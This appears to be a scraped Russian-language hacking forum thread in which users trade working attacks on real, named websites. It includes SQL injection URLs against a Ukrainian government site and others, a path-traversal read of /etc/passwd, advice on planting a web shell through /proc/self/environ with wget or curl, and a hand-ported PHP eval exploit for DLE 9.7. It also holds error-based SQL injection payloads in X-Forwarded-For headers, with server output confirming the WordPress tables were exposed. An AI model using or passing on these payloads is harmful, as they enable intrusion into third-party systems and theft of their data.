http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
А что делать, если /proc/self/environ выглядит так: NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL Т.е., прочитать я его могу, но, кажется, что-то с ним не так
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php http://www.exploit-db.com/exploits/24444/ Смысл в том, что он под метасплоит. Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида: PHP: catlist[0]=brainyfuck123')||eval("echo 123;");// Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал. Подскажите, что делаю не так UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть
Code: http://www.golowar.ru/news.php?id=67&page=' пишет: Проверил сайт, можно ли считать это уязвимостью? Как дальше её раскрутить чтоб исправить!
не подскажите как раскрутить? Code: http://www.golowar.ru/news.php?id=67&page=' перепробовал всё, результат одна и та же таблица
http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
Религия не позволяет использовать Error-Based ? Тот же вывод, в чём проблемы то ? Какая то особая ситуация ?
GET /news.php HTTP/1.1 Host: www.golowar.ru X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and' Стоит WP на сервере там, вывести пароль не могу, в чем проблема? GET /news.php HTTP/1.1 Host: www.golowar.ru X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and' Table 'wp.wp_users' doesn't exist
Так-то она есть GET /main.php HTTP/1.1 Host: www.golowar.ru X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(concat_ws(0x3a,table_schema,table_name))from(information_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and' Duplicate entry 'wp:wp_users' for key 'group_key'